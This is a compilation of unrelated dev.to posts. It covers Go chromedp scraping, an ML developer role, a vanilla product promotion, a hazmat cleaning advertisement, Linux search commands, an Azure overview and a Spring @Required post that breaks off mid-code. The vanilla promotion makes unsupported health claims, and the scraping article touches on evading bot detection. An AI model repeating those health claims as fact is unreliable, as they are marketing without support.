- single page apps have gained huge traction, most everyone turning to building their content in a `js` bundle, loading everything on the fly as the page loads
- websites have become fussy about having their data used by unknown parties, so they have been closing down access and have become very litigious(#TODO: maybe add some cases of court cases Linkedin vs those guys, Financial Times vs OpenAI)
- bot detection and prevention - this one is funny since it is like a flywheel, it built 2 lucrative markets overnight - bot services and anti bot protection
- TBH, it's difficult to predict where this might be heading; it kind of feels like people have been aiming to move all their data into data centers, but since data is becoming so guarded... will they move back to paper?

Because of `SPAs` and the wide adoption of `js` in websites, it is much more convenient to use some sort of browser automation to crawl pages and extract the information. This is less prone to badgering the servers and spares you from reverse engineering the page content loading, so you will probably want to use either a [`chrome developer tools protocol`](https://chromedevtools.github.io/devtools-protocol/) or [`webdriver`](https://www.w3.org/TR/webdriver/) flavored communications protocol with the browser. Back in the day, IIRC, I also used the [`PyQt`](https://www.riverbankcomputing.com/software/pyqt/intro) bindings for accessing the `Qt` browser component, but nowadays it's mostly straight-up browsers.
These days my goto is `puppeteer`. It's a weird tool that can easily be used to scrape data from pages. The reason I say it is weird is mainly the deceiving nature of the internals: essentially two `js` engines that communicate via the `cdp` protocol, which is a very dense beast and does not play nice with complex objects.
Recently it has become more appealing to me to use strongly typed languages. This is probably because I have started to narrow down my experiments to very small code samples that illustrate one thing at a time. I would go as far as to call it experiment driven development. Duck typing is fun as you can print pretty much anything you want. I was thinking of using `rust` but it has a very tough learning curve. Node is pretty nice with `mjs`, but it gets confusing when it crosses over between the two event loops; also, while it is good for communicating over `cdp`, it is not really designed for sync code. `python` is a bit boring for me, so I decided to look at `go`. Since it is a Google language, I expected it to have decent support for cdp, and the learning curve is slightly gentler than `rust`'s.
## How?
Looking at the alternatives, there are two that stand out: [`chromedp`](https://github.com/chromedp/chromedp) and [rod](https://go-rod.github.io/#/). Rod looks like it is the prodigal son of [`behave`](https://behave.readthedocs.io/en/latest/) and [`cucumber`](https://cucumber.io/), two well-established BDD frameworks. Personally I am not finding the `MustYaddaYadda...` style very readable, and combining it with other custom APIs would probably make the code inconsistent. It has a few nice things in the way it abstracts `iframes`, but I am just unable to get past the higher level API.
In the end I wound up choosing `chromedp`. It works pretty well for most use cases, there are some places where it doesn't quite cut it and I wish it did, but by now I have come to terms there is no one technology to rule them all, wouldn't it be nice if that existed?
You can install it via `go get -u github.com/chromedp/chromedp` and then you can start using it in your code. It has quite a few submodules and related projects that you may want to use depending on your concrete use case.
Generally, if your use case is only data extraction and you have no tricky actions to deal with (the page is _bot resistant_, some elements are loaded at later times, `iframe` hell, etc.), the imports below will cover most of what you need.
```go
import (
"context"
"log"
"time"
"github.com/chromedp/chromedp"
"github.com/chromedp/cdproto/cdp"
// for slightly more advanced use cases
"github.com/chromedp/cdproto/browser"
"github.com/chromedp/cdproto/dom"
"github.com/chromedp/cdproto/storage"
"github.com/chromedp/cdproto/network"
)
```
## The pleasant surprises
Well, calling them surprises is a bit of a stretch; I have been using `golang` over the years and I have to admit it is a pretty nice ecosystem and language.
`chromedp` automates chrome or any binary that you are able to communicate with via [`cdp`](https://github.com/chromedp/chromedp/blob/ebf842c7bc28db77d0bf4d757f5948d769d0866f/allocate.go#L349). The API is somewhat intuitive, haven't found myself diving into the guts of it very often to figure out how stuff works. The good part is that once you extract the data from the nodes you are interested in you can map it to go structs and make use of the go typing system.
For example you can grab a list of elements via selector:
```go
var productNodes []*cdp.Node
if err := chromedp.Run(ctx,
// visit the target page
chromedp.Navigate("https://scrapingclub.com/exercise/list_infinite_scroll/"),
chromedp.Evaluate(script, nil),
chromedp.WaitVisible(".post:nth-child(60)"),
chromedp.Nodes(`.post`, &productNodes, chromedp.ByQueryAll),
); err != nil {
log.Fatal("Error while trying to grab product items.", err)
}
```
then map each element to a struct
```go
for _, node := range productNodes {
if err := chromedp.Run(ctx,
chromedp.Text(`h4`, &name, chromedp.ByQuery, chromedp.FromNode(node)),
chromedp.Text(`h5`, &price, chromedp.ByQuery, chromedp.FromNode(node)),
); err != nil {
log.Fatal("Error while trying to grab product items.", err)
}
products = append(products, Product{name: name, price: price})
}
```
Another nice perk is that go is built with concurrency in mind so crunching the extracted data can be a lot more performant than in puppeteer.
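To illustrate that point, here is a minimal, standard-library-only sketch of fanning scraped values out to a pool of goroutines (the price format and the `parsePrice` helper are made up for the example, not part of chromedp):

```go
package main

import (
	"fmt"
	"strconv"
	"strings"
	"sync"
)

// parsePrice converts a scraped price string like "$24.99" to a float64.
func parsePrice(raw string) float64 {
	v, err := strconv.ParseFloat(strings.TrimPrefix(strings.TrimSpace(raw), "$"), 64)
	if err != nil {
		return 0
	}
	return v
}

// parseAll fans the raw strings out to a fixed number of worker
// goroutines and writes each parsed value back at the same index.
func parseAll(raw []string, workers int) []float64 {
	out := make([]float64, len(raw))
	jobs := make(chan int)
	var wg sync.WaitGroup
	for w := 0; w < workers; w++ {
		wg.Add(1)
		go func() {
			defer wg.Done()
			for i := range jobs {
				out[i] = parsePrice(raw[i])
			}
		}()
	}
	for i := range raw {
		jobs <- i
	}
	close(jobs)
	wg.Wait()
	return out
}

func main() {
	prices := parseAll([]string{"$24.99", "$12.50", "$7.00"}, 2)
	fmt.Println(prices)
}
```

Each worker owns a distinct index when it writes, so no locking is needed on the output slice.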
Yet another pretty nifty thing I found is that you can deliver a binary that can be compiled for multiple platforms and can be distributed easily. This is a huge plus given that you may not really know who the user of the tool might be in the end.
## The ugly parts
The way to communicate with the browser is still the `cdp` protocol, and you can only pass objects that can be serialized.
If you need to work with objects that can't be serialized you will need to inject `js` into the page context and interact with it.
When you have a page that contains `iframes` it is problematic to trigger events on the elements inside them. You can extract data from it but triggering events gets messy as you need `js` for that.
An example of how you might extract data from an `iframe` might look something like this:
```go
var iframes []*cdp.Node
if err := chromedp.Run(ctx, chromedp.Nodes(`iframe`, &iframes, chromedp.ByQuery)); err != nil {
fmt.Println(err)
}
if err := chromedp.Run(ctx, chromedp.Nodes(`iframe`, &iframes, chromedp.ByQuery, chromedp.FromNode(iframes[0]))); err != nil {
fmt.Println(err)
}
var text string
if err := chromedp.Run(ctx,
chromedp.Text("#second-nested-iframe", &text, chromedp.ByQuery, chromedp.FromNode(iframes[0])),
); err != nil {
fmt.Println(err)
}
```
But in order to trigger events on elements inside the iframe you can't just use the `chromedp` API, and since `chromedp.Evaluate` does not take a `Node` as context you will need to perform all the actions in `javascript` and that will make the resulting code a bit of a mishmash of `go` and `js`.
`puppeteer` also has some extra packages that can be used like `puppeteer-stealth` but `chromedp` does not seem to have an equivalent for that at this time. The `rod` package has [`rod stealth`](https://github.com/go-rod/stealth) but I haven't tried it since the API is not to my liking.
The other slightly disappointing missing feature is that when running in headless mode all the GPU features are disabled, because it is running in a [`headless-chrome`](https://github.com/chromedp/docker-headless-shell) container which does not have a display server. Puppeteer is able to run with GPU features enabled, allowing it to pass the [`webgl fingerprinting`](http://bot.sannysoft.com/) tests.
## Conclusion
- in some ways puppeteer is still better than `chromedp`, working with `iframes` falls short
- `rod` is a nice alternative but its API looks like it was designed for testing, reminds me of `cucumber`
- `chromedp` is a nice alternative to `puppeteer` if you are looking to build a binary that can be distributed easily
- it is a bit more performant than `puppeteer` due to the concurrency model in `go`
*Author: adaschevici*
# Dev: Machine Learning
*Published 2024-06-06 at https://dev.to/r4nd3l/dev-machine-learning-f9a (tags: machinelearning, developer)*

A **Machine Learning Developer** is a specialized professional who leverages machine learning algorithms and techniques to build intelligent systems and applications that can learn from data and make predictions or decisions without being explicitly programmed. Here's a detailed description of the role:
1. **Understanding of Machine Learning Concepts:**
- Machine Learning Developers possess a strong understanding of machine learning concepts, including supervised learning, unsupervised learning, reinforcement learning, deep learning, and neural networks.
- They are familiar with various machine learning algorithms such as linear regression, logistic regression, decision trees, random forests, support vector machines (SVM), k-nearest neighbors (KNN), clustering algorithms, and neural network architectures.
2. **Data Preprocessing and Feature Engineering:**
- Machine Learning Developers preprocess raw data by cleaning, transforming, and normalizing it to prepare it for model training.
- They perform feature engineering to extract relevant features from the data, select or engineer new features, and encode categorical variables for input into machine learning models.
3. **Model Selection and Training:**
- Machine Learning Developers select appropriate machine learning models based on the nature of the problem, dataset size, and performance requirements.
- They train machine learning models using labeled data (in supervised learning) or unlabeled data (in unsupervised learning) to optimize model parameters and minimize prediction errors.
4. **Evaluation and Model Performance Metrics:**
- Machine Learning Developers evaluate the performance of machine learning models using appropriate evaluation metrics such as accuracy, precision, recall, F1 score, ROC-AUC, mean squared error (MSE), and R-squared.
- They analyze model performance on training and validation datasets, detect overfitting or underfitting, and fine-tune model hyperparameters to improve performance.
5. **Deep Learning and Neural Networks:**
- Machine Learning Developers specialize in deep learning techniques and neural network architectures for tasks such as image recognition, natural language processing (NLP), speech recognition, and time series prediction.
- They design and implement convolutional neural networks (CNNs) for image classification, recurrent neural networks (RNNs) for sequential data processing, and transformer models for NLP tasks.
6. **Model Deployment and Integration:**
- Machine Learning Developers deploy trained machine learning models into production environments, integrating them with existing systems, applications, or APIs for real-time inference.
- They use deployment technologies such as Docker, Kubernetes, Flask, Django, or serverless platforms to create scalable and reliable machine learning pipelines and services.
7. **Continuous Model Monitoring and Maintenance:**
- Machine Learning Developers monitor deployed machine learning models for performance degradation, concept drift, or data drift over time.
- They retrain models periodically with new data, update model parameters, or reevaluate model assumptions to ensure continued accuracy and reliability.
8. **Interdisciplinary Skills:**
- Machine Learning Developers possess interdisciplinary skills in mathematics, statistics, computer science, and domain-specific knowledge relevant to the application area.
- They collaborate with data scientists, domain experts, software engineers, and business stakeholders to understand requirements, define success criteria, and deliver effective machine learning solutions.
9. **Ethical Considerations and Responsible AI:**
- Machine Learning Developers adhere to ethical guidelines and principles in machine learning and AI development, ensuring fairness, transparency, and accountability in model design and deployment.
- They address ethical concerns related to bias, privacy, security, and unintended consequences of machine learning systems, incorporating ethical considerations into the entire machine learning lifecycle.
10. **Continuous Learning and Skill Development:**
- Machine Learning Developers stay updated on the latest advancements in machine learning research, algorithms, frameworks, and tools.
- They participate in online courses, workshops, conferences, and research publications to enhance their knowledge and skills in machine learning and AI technologies.
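As a small, concrete illustration of the evaluation metrics listed in point 4, here is a minimal pure-Python sketch (no ML framework; the label and prediction lists are made-up toy data):

```python
def accuracy(y_true, y_pred):
    """Fraction of predictions that exactly match the labels."""
    correct = sum(t == p for t, p in zip(y_true, y_pred))
    return correct / len(y_true)

def mean_squared_error(y_true, y_pred):
    """Average of the squared differences between targets and predictions."""
    return sum((t - p) ** 2 for t, p in zip(y_true, y_pred)) / len(y_true)

# Toy classification labels vs. predictions
print(accuracy([1, 0, 1, 1], [1, 0, 0, 1]))        # → 0.75
# Toy regression targets vs. predictions
print(mean_squared_error([3.0, 5.0], [2.0, 5.0]))  # → 0.5
```

In practice these come ready-made from libraries, but the formulas themselves are this simple.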
In summary, a Machine Learning Developer plays a crucial role in designing, developing, and deploying machine learning models and systems that leverage data-driven insights to solve complex problems and improve decision-making processes across various domains and industries. By combining expertise in machine learning algorithms, data preprocessing, model evaluation, deployment, and continuous improvement, they drive innovation and create value through intelligent applications of AI technology.

*Author: r4nd3l*
# Discover the Essence of Indonesian Vanilla: Centralsun Vanilla Powder and Vanilla Seeds
*Published 2024-06-06 at https://dev.to/machik99/discover-the-essence-of-indonesian-vanilla-centralsun-vanilla-powder-and-vanilla-seeds-5269*

Vanilla, often referred to as the "queen of spices," is a beloved ingredient around the globe, revered for its unique aroma and rich flavor. Among the various sources of vanilla, Indonesia stands out as a premier producer, known for its high-quality and pure vanilla products. Centralsun, a brand committed to delivering the finest natural products, offers two exceptional vanilla offerings: Vanilla Powder and Vanilla Seeds. Both sourced from the lush landscapes of Indonesia, these products encapsulate the true essence of vanilla, providing a versatile and delectable addition to any culinary creation. In this blog post, we will explore the remarkable qualities and uses of [Centralsun's Vanilla Powder](https://centralsun.com/product/vanilla-powder/) and [Vanilla Seeds](https://centralsun.com/product/vanilla-seeds-50g/), and why they are a must-have in your kitchen.
## The Origin of Centralsun Vanilla
Indonesia, an archipelago with a rich biodiversity and ideal climatic conditions, is one of the world's leading producers of vanilla. The country's fertile soil and tropical weather create the perfect environment for growing vanilla orchids, the source of this precious spice. Centralsun takes pride in sourcing their vanilla directly from Indonesian farmers, ensuring that every product embodies the highest quality and authenticity. By supporting sustainable farming practices and fair trade, Centralsun not only delivers superior products but also contributes to the well-being of local communities.
## Centralsun Vanilla Powder: Pure, Potent, and Versatile
### Purity and Quality
Centralsun Vanilla Powder is made from 100% pure vanilla beans, finely ground to create a potent and aromatic powder. Unlike synthetic vanilla flavorings or extracts, this powder contains no additives, preservatives, or artificial ingredients. The purity of Centralsun Vanilla Powder is evident in its intense aroma and deep, complex flavor, which is derived from the natural compounds found in vanilla beans.
### Versatile Culinary Uses
Vanilla Powder is a versatile ingredient that can enhance a wide range of dishes, from sweet to savory. Its concentrated flavor means that a small amount goes a long way, making it an economical choice for home cooks and professional chefs alike.
- **Baking:** Vanilla powder is a baker's delight. It can be added to cakes, cookies, muffins, and pastries to impart a rich, vanilla flavor without the need for liquid extracts. This makes it particularly useful in recipes where additional liquid might alter the desired consistency.
- **Beverages:** Stir a pinch of vanilla powder into your coffee, tea, smoothie, or hot chocolate for a delightful twist. Its ability to dissolve easily makes it a perfect addition to both hot and cold drinks.
- **Savory Dishes:** Surprisingly, vanilla can also complement savory dishes. Add a touch of vanilla powder to sauces, marinades, or spice rubs for a unique and aromatic depth of flavor.
- **Homemade Vanilla Sugar:** Create your own vanilla sugar by mixing vanilla powder with granulated sugar. This can be used to sweeten baked goods and beverages, or sprinkled over fresh fruit.
### Health Benefits
Apart from its delightful flavor, vanilla powder also offers several health benefits. Vanilla is known for its antioxidant properties, which help combat free radicals and reduce inflammation. Additionally, the aroma of vanilla has been linked to mood enhancement and stress relief, making it a perfect addition to a relaxing cup of tea or a comforting dessert.
## Centralsun Vanilla Seeds: A Burst of Authentic Flavor
### Authentic and Exotic
Centralsun Vanilla Seeds are the tiny black seeds found inside the vanilla pod. These seeds are meticulously harvested from the finest Indonesian vanilla beans, ensuring that they are of the highest quality. The seeds have a more intense flavor compared to vanilla extract, providing a burst of authentic vanilla taste in every bite.
### Culinary Magic
Vanilla seeds are a chef's secret weapon, capable of transforming ordinary dishes into extraordinary culinary experiences.
- **Desserts:** Vanilla seeds are often used in desserts like crème brûlée, panna cotta, and ice cream. The visual appeal of the tiny black seeds, combined with their powerful flavor, elevates these classic desserts to new heights.
- **Baking:** Incorporate vanilla seeds into your cake and cookie recipes for a more pronounced vanilla flavor. The seeds disperse evenly throughout the batter, ensuring that every bite is infused with vanilla goodness.
- **Custards and Puddings:** Vanilla seeds can be added to custards and puddings, imparting a deep, rich flavor and a speckled appearance that indicates the presence of real vanilla.
- **Fruit Compotes:** Add vanilla seeds to fruit compotes or jams for an exotic twist. The seeds blend beautifully with the fruit, enhancing its natural sweetness and adding a layer of complexity.
### Health Benefits
Like vanilla powder, vanilla seeds are rich in antioxidants and possess anti-inflammatory properties. They are also known to aid in digestion and have been used traditionally to alleviate stomach discomfort. Additionally, the sweet, comforting aroma of vanilla seeds can have a calming effect, promoting relaxation and well-being.
## Why Choose Centralsun?
Centralsun is dedicated to providing products that are not only of the highest quality but also ethically sourced and environmentally friendly. Here are a few reasons why Centralsun Vanilla Powder and Vanilla Seeds stand out:
- **Sustainability:** Centralsun works closely with Indonesian farmers to ensure sustainable farming practices. This not only protects the environment but also supports the livelihoods of local communities.
- **Purity:** Both the vanilla powder and seeds are free from additives, preservatives, and artificial ingredients, ensuring that you get nothing but pure, natural vanilla.
- **Quality:** The meticulous sourcing and production processes guarantee that every product meets the highest standards of quality and flavor.
- **Versatility:** Whether you're a home cook or a professional chef, Centralsun's vanilla products offer endless culinary possibilities, allowing you to create dishes that are both delicious and memorable.
Conclusion
Centralsun's Vanilla Powder and Vanilla Seeds are exceptional products that bring the true essence of Indonesian vanilla to your kitchen. Their purity, quality, and versatility make them invaluable ingredients for a wide range of culinary creations. By choosing Centralsun, you are not only enhancing your cooking but also supporting sustainable practices and fair trade. So, whether you're baking a batch of cookies, crafting a gourmet dessert, or simply enjoying a cup of vanilla-infused coffee, let the rich, aromatic flavor of Centralsun's vanilla products elevate your culinary experience to new heights.
| machik99 | |
1,879,678 | What Are the Benefits of Hazmat Cleaning Services? | Services for hazmat cleaning provide many important advantages... | 0 | 2024-06-06T21:51:23 | https://dev.to/bio_hazards_2766c0590308e/what-are-the-benefits-of-hazmat-cleaning-services-4nfm | | Hazmat cleaning services offer several important advantages for handling hazardous materials safely. First, they employ qualified workers with specialized tools and training to handle and dispose of dangerous materials in a way that protects the environment and public health. Second, professional hazmat cleaning lowers the risk of legal consequences by ensuring adherence to the strict rules and standards set by regulatory bodies. These services also reduce the likelihood of accidents or injuries and prevent the spread of contamination. Professionals experienced in hazmat cleanup can help individuals and organizations reduce risks, uphold safety regulations, and ensure that hazardous materials are managed properly.
Complete Cleaning Solutions for All Circumstances
Mould Cleaning Services and Soot Cleaning Services: Both mould and soot can seriously harm one's health and cause property damage. Our mould cleaning services stop the growth of mould and efficiently remove stubborn stains and residue, leaving a clean and safe environment.
Mould Removal Services and Forensic Cleaning Services: For complete mould removal, our specialists use cutting-edge methods and tools to eliminate mould colonies entirely. Likewise, our forensic cleaning services handle sensitive situations with tact and discretion, guaranteeing thorough cleanup and restoration.
Hazmat Cleaning Services & After Accident Cleaning Services: Our hazmat cleaning services securely handle and dispose of hazardous materials. To minimize disruption and maintain sanitation and safety, our after-accident cleaning services quickly return damaged areas to their pre-accident state.
After Fall and Injury Cleaning & Bio Cleanup, Remediation and Restoration: Our cleaning services offer quick and thorough cleanup after falls or injuries, effectively treating spills of blood and bodily fluids. Moreover, by carefully handling biohazardous materials, our bio cleanup, remediation, and restoration services return environments to a clean and safe state.
Disaster cleaning services and homicide cleaning services: Following tragic incidents such as homicides, we provide careful and kind cleaning, restoring impacted areas with tact and expertise. Our disaster cleaning services also offer thorough cleanup solutions and quick response times in the event of a natural or man-made disaster.
Mouse droppings cleaning services and antiviral sanitization services: By successfully getting rid of bacteria and viruses, we can create a clean, hygienic atmosphere. In order to prevent health risks, our mouse droppings cleaning services also handle rodent infestations, removing droppings and sanitising affected areas.
Allergy Clean Up Services & Nicotine, Tobacco and Smoke Odour Removal and Cleaning Services : Effective allergen targeting is achieved by allergy clean-up services, which relieve allergy symptoms. Furthermore, unpleasant odours are eliminated by our cleaning and odour removal services for nicotine, tobacco, and smoke, giving indoor spaces a fresh new look.
Finally, our wide range of specialised cleaning services is intended to successfully handle a variety of circumstances and risks. We guarantee comprehensive and expert restoration of impacted areas, from forensic and hazmat cleaning to soot and mould removal. We offer bio cleanup and remediation in addition to accident, fall and injury cleanup. We manage delicate situations with empathy and effectiveness because of our experience with homicide and disaster cleanup. In addition, by keeping our clients' environments clean and safe, our antiviral sanitization, mouse droppings, allergy cleanup, and nicotine, tobacco, and smoke odour removal services promote health and well-being.
| bio_hazards_2766c0590308e | |
1,874,732 | Mastering Linux: Easy Tips for Locating Files Folders and Text | Introduction I see a world where every device will utilize Linux in the nearest future.... | 0 | 2024-06-06T21:50:51 | https://dev.to/oluwatobi2001/mastering-linux-easy-tips-for-locating-files-folders-and-text-1gnc | linux, file, search, grep | ## Introduction
I see a world where every device will run Linux in the near future. It's currently the driving force for open-source development globally, and it has cemented its relevance in today's world as the backbone of many applications and services. Sound knowledge of this operating system, and the ability to execute programs with it, gives a developer an advantage.
This article, which is the first of many, serves as a guide for developers on how to perform basic search commands using Linux. These commands are needed to locate files, directories, and text.
As a popular programmer stated, the best way to learn Linux is to use it. Having Linux installed and running is a prerequisite for this tutorial, to facilitate easy comprehension and practice. With that completed, let's get started.
## Linux search commands
Searching for files can be cumbersome and complex for the new Linux user, especially as it is a sharp contrast from the Windows OS. Thankfully, newer Linux distros include polished graphical user interfaces to enhance user interaction and experience, but mastery of the Linux search commands via the command line is still relevant; hence this tutorial. We will now introduce the various Linux commands used for file and text searches. They include:
- `locate`
- `find`
- `grep`
The `find` and `locate` commands are specifically designed to search for files and directories within the Linux file system, while `grep` is suited to locating text within files. Details of their use cases, with relevant examples, are provided in the subsequent sections.
## Locate command
This command, alongside the `find` command mentioned earlier, is used to search for files by name within the Linux file system directories. But how is it different from the `find` command, seeing that they appear synonymous?
Firstly, the `locate` command looks up the file being searched for in a database of filenames, which is updated automatically (typically once a day).
This gives it a faster search time than the `find` command. However, it has a flaw: the database only gets updated at a specified time each day, or when the update is run manually. Hence, files saved after the database was last updated won't be shown in the search results.
Here is a command to search for the file `laptop.txt` using locate.
`locate laptop`

As you can see, the filename is searched in the `plocate` database, which does not yet have the file indexed.
With that, we have successfully discussed the locate command. Up next is the find command
## Find Command
The `find` command, as highlighted briefly in the previous paragraph, can also be used to locate files by name within a given directory. However, unlike the `locate` command, which searches an indexed database of filenames, `find` walks the Linux file system itself to locate the files in question. This results in a much slower response time than `locate`. In return, `find` always reflects the current state of the file system, so it will match files regardless of when they were saved, unlike the `locate` command.
Here is a command to search for the file `laptop.txt` using find.
`find . -name "laptop.txt"`

## Grep
This is a command used in Linux to search for words or phrases within text files. It's an acronym that stands for "global regular expression print". It not only locates the files that contain the text in question but also prints the lines where that text is found. Here is an example of how grep can be used.
`grep -r laptop .`

The above command searches for the text `"laptop"` and outputs every matching line it finds. By default, grep is case-sensitive, matching the text only in the exact case given. However, due to its inherent flexibility, it can also produce case-insensitive matches. To achieve this, the `-i` option is added to the command.
Here is a command to search for the text "laptop" in `laptop.txt`, eliminating the case sensitivity, using grep.
`grep -i laptop laptop.txt`

This will output all matching lines, ignoring the case of the matched text.
Also, grep provides an inverted search feature, which outputs all lines that do not contain the text being matched and ignores the lines that do contain it. The `-v` option enables this:
`grep -vi laptop laptop.txt`
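Putting these grep options together in a short, self-contained sketch (the file contents are illustrative):

```shell
# create a sample file with mixed-case matches
mkdir -p /tmp/grep-demo
printf 'Laptop on sale\ndesktop only\nmy laptop broke\n' > /tmp/grep-demo/laptop.txt

grep -n laptop /tmp/grep-demo/laptop.txt    # case-sensitive, with line numbers
grep -in laptop /tmp/grep-demo/laptop.txt   # -i ignores case, so "Laptop" now matches
grep -vi laptop /tmp/grep-demo/laptop.txt   # -v inverts the match
grep -ril laptop /tmp/grep-demo             # -r recurses a directory; -l lists matching files
```

Note that the case-sensitive search skips the line starting with "Laptop", while the `-i` variant catches it.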
So far, these commands can be used to navigate through the Linux file directory to locate various files and text within the Linux OS. It is also essential to gain mastery of other Linux file commands such as `ls`, `mv`, `rm` and `rmdir` which can be used in file navigation and file structure modification.
## Conclusion
With this, we have come to the end of the tutorial. We hope you've learned the essentials of these Linux commands, how to use them, and their pros and cons. Feel free to drop any questions or comments in the comment box below. You can also reach out to me on my blog and check out my other articles [here](https://linktr.ee/tobilyn77). Till next time, keep on coding!
| oluwatobi2001 |
1,877,744 | Unlocking The Power Of Azure | ~~Microsoft **Azure is a leading cloud computing platform that has revolutionized the way business... | 0 | 2024-06-06T21:50:47 | https://dev.to/tojumercy1/unlocking-the-power-of-azure-1n71 | azure, cloud, devops, computerscience | Microsoft **Azure** is a leading cloud computing platform that has revolutionized the way businesses approach computing, storage, and networking over the internet.
The importance of **Azure** in the cloud computing landscape cannot be overstated. It offers a robust and scalable infrastructure for businesses to build, deploy, and manage applications and services.
This introduction sets the stage for exploring the core architectural components of Azure.
Let's dive into the first core architectural component of Azure:
## 1. Azure Resource Manager (ARM)
Azure Resource Manager (ARM) is the deployment and management service for Azure resources. It provides a unified way to create, manage, and deploy resources across Azure. With ARM, you can:
- Define infrastructure as code using templates (ARM templates)
- Deploy and manage resources consistently across different environments (dev, test, prod)
- Organize resources into logical groups (resource groups)
- Apply access control and permissions (RBAC)
- Monitor and troubleshoot resources
ARM is the foundation of Azure's resource management and deployment capabilities. It enables you to define and manage your Azure resources in a consistent, reproducible, and scalable way.
Here are some key benefits of using ARM:
- Infrastructure as Code: ARM templates allow you to define your infrastructure as code, making it easier to version, manage, and reproduce your environment.
- Consistency: ARM ensures consistency across different environments and deployments, reducing errors and inconsistencies.
- Scalability: ARM enables you to scale your resources up or down as needed, without worrying about manual configuration and deployment.
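To make the "infrastructure as code" point concrete, here is a minimal sketch of what an ARM template looks like, deploying a single storage account. The parameter name and API version here are illustrative choices of mine, not taken from the article:

```json
{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "parameters": {
    "storageName": { "type": "string" }
  },
  "resources": [
    {
      "type": "Microsoft.Storage/storageAccounts",
      "apiVersion": "2022-09-01",
      "name": "[parameters('storageName')]",
      "location": "[resourceGroup().location]",
      "sku": { "name": "Standard_LRS" },
      "kind": "StorageV2"
    }
  ]
}
```

Because the template is just a JSON file, it can be versioned in source control and deployed repeatedly to any environment, which is exactly the consistency benefit described above.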
Let's continue with the next core architectural component of Azure:
## 2. Azure Virtual Machines (VMs)
Azure Virtual Machines (VMs) are virtualized computers that run in Azure. They provide a flexible and scalable way to deploy applications and services. With Azure VMs, you can:
- Choose from a range of operating systems and configurations
- Scale up or down as needed
- Use Azure VMs as a lift-and-shift solution for on-premises applications
- Take advantage of Azure's managed disk and storage capabilities
Azure VMs are built on top of Azure's robust infrastructure and provide features like:
- High availability and reliability
- Security and compliance
- Networking and connectivity
- Monitoring and diagnostics
Let's move on to the next core architectural component of Azure:
## 3. Azure Storage
Azure Storage is a highly durable and scalable cloud storage service that allows you to store and access data in the cloud. It provides a range of storage options, including:
- Blob Storage: For storing unstructured data like images, videos, and files
- File Storage: For storing and sharing files in a hierarchical structure
- Queue Storage: For passing messages between applications and services
- Table Storage: For storing structured data in a NoSQL database
- Disk Storage: For attaching data disks to virtual machines
Azure Storage provides features like:
- Data redundancy and replication for high availability
- Scalability to store large amounts of data
- Security and access control
- Data compression and encryption
- Integration with Azure services and applications
Here is a diagram of Azure Storage:

Let's move on to the next core architectural component of Azure:
## 4. Azure Networking
Azure Networking provides a range of services that enable you to create, manage, and secure networks in Azure. These services include:
- Virtual Networks (VNets): Private networks in Azure that isolate your resources
- Subnets: Subdivisions of VNets for organizing resources
- Network Security Groups (NSGs): Firewall rules for controlling traffic
- Load Balancers: Distributing traffic across resources
- Application Gateways: Web traffic management and security
- ExpressRoute: Dedicated connections to Azure from on-premises infrastructure
Azure Networking provides features like:
- Secure and isolated networks
- Scalability and high availability
- Network segmentation and isolation
- Traffic management and load balancing
- Integration with Azure services and applications
Here is a diagram of Azure Networking:

Let's move on to the next core architectural component of Azure:
## 5. Azure Analytics and AI
Azure Analytics and AI provide a range of services that enable you to build, deploy, and manage analytics and AI solutions in Azure. These services include:
- Azure Synapse Analytics: A cloud-based data warehouse and analytics service
- Azure Databricks: A fast, easy and collaborative Apache Spark-based analytics platform
- Azure Machine Learning: A cloud-based platform for building, deploying, and managing machine learning models
- Azure Cognitive Services: A set of pre-built AI models for vision, speech, language, and decision-making
- Azure Search: A cloud-based search service for applications and websites
Azure Analytics and AI provide features like:
- Data processing and analytics
- Machine learning and AI model development
- Natural language processing and computer vision
- Predictive analytics and forecasting
- Integration with Azure services and applications
## Conclusion

Here is a summary of the key points from our tour of Azure's core architectural components:
Azure is a comprehensive cloud platform that offers a wide range of services and tools for building, deploying, and managing applications and workloads. The core architectural components of Azure include:
1. Compute: Virtual Machines, Functions, and Container Instances
2. Storage: Blob, File, Queue, Table, and Disk Storage
3. Networking: Virtual Networks, Load Balancers, and Application Gateways
4. Analytics and AI: Synapse Analytics, Machine Learning, Cognitive Services, and Search
These components provide a solid foundation for building, deploying, and managing a wide range of applications and workloads in Azure. By leveraging these services, developers and organizations can take advantage of the scalability, reliability, and security of the Azure cloud platform.
I hope this tour has provided a helpful overview of Azure's core architectural components! Here are some ways to start exploring Azure yourself:
1. Try Azure for free: Sign up for the free trial and explore Azure without committing to a paid subscription.
2. Hands-on tutorials and guides: Work through Microsoft's step-by-step tutorials, guides, and labs to get started with Azure services.
3. Real-world use cases and success stories: Read about how businesses and organizations use Azure to solve real-world problems and achieve success.
4. Azure community and forums: Join the Azure community, participate in forums, and connect with experts and peers.
5. Azure certifications and training: Get certified in Azure and take advantage of training resources for upskilling.
6. Innovative features and updates: Follow the latest innovations and updates in Azure's constantly evolving platform.
7. Cost-effective and scalable: Use Azure to reduce costs and scale resources as needed.
8. Secure and compliant: Rely on Azure's robust security and compliance features for peace of mind.
9. Integration with other Microsoft tools: Take advantage of Azure's seamless integration with other Microsoft tools and services.
Ready to unlock the full potential of Azure? Sign up for a free trial today and start exploring the many services and features that Azure has to offer. From machine learning to data analytics, and from security to compliance, Azure has the tools you need to take your business to the next level. Join the Azure community, get certified, and start building your cloud-first future! | tojumercy1 |
1,879,674 | Understanding Spring's @Required Annotation: A Legacy Perspective | While the @Required annotation has been deprecated since Spring Framework 5, it's not uncommon to... | 27,602 | 2024-06-06T21:38:33 | https://springmasteryhub.com/2024/06/06/understanding-springs-required-annotation-a-legacy-perspective/ | java, programming, spring, springboot | While the `@Required` annotation has been deprecated since Spring Framework 5.1, it's not uncommon to encounter it in legacy projects.
So, why should you care?
Not every project is built on a fresh new Spring Framework version; there are a lot of legacy projects out there, and maybe you are working on one right now or will work on one in the future.
So, after reading this blog post, you will understand what this annotation does and how it's used.
Maybe you are reading this right now because of it.
## **What @Required Does**
It tells Spring that a specific bean property, as the annotation name says, is **required**.
It is a method-level annotation that checks if the required property was set at configuration time. If the dependency is not provided when the bean was created, Spring will throw a `BeanInitializationException`.
This was useful in the past to make some bean properties mandatory.
Today, you can achieve this by putting the dependencies in the bean constructor or by using an `@Autowired` annotation in the set method.
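As an illustration, here is a minimal, Spring-free sketch of the constructor-injection alternative. The class and error message are my own; the point is that the dependency becomes mandatory at construction time, failing fast much like `@Required` did at bean-configuration time:

```java
import java.util.Objects;

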